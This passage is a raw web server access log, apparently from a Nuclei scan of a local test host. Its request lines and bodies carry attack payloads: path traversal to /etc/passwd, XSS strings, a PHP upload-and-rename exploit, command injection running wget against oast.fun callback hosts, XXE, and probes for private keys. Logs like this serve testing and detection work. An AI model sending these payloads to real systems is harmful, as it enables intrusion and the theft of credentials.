5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bbpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"SAMLResponse=%22%3E%3Csvg/onload=alert(/29KAY0YAZ4gvuE62fdzHqb2aKFw/)%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json/v1.0/29KAY7rjpbtam7sPD6dsBORDPSE@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/idx-broker-platinum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_ID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_FileUploadDir\x22\x0D\x0A\x0D\x0A/wp-content/uploads/simple-file-list/\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Timestamp\x22\x0D\x0A\x0D\x0A1587258885\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Token\x22\x0D\x0A\x0D\x0Aba288252629a5399759b6fde1e205bc2\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22nuclei.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/console?.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin//phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"action=&token=`wget http://ca285tosmpvbafqg07h0e6qnj1wnurhoj.oast.fun`&mode=`wget http://ca285tosmpvbafqg07h0hkqsghdw4ceoy.oast.fun`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /storfs-asup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /loginLess/../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com;@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /misc.php?action=showpopups&type=friend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/credentials.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Administrator\x0D\x0A Administrator\x0D\x0A bi\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlpserver/services/XMLPService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"{\x0D\x0A \x22token\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/newpassword HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site_cg/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/database/pme/phinx.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Reports/Pages/Folder.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https%3a%2f%2fexample.com%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.esmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"]>&disclose;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /slr/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like 